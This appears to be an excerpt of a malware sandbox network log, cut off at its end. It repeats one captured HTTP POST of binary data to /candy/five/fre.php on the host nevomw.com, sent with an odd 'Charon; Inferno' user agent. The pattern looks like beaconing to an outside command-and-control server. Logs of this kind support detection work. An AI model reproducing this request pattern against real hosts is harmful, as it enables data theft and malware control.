                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: glo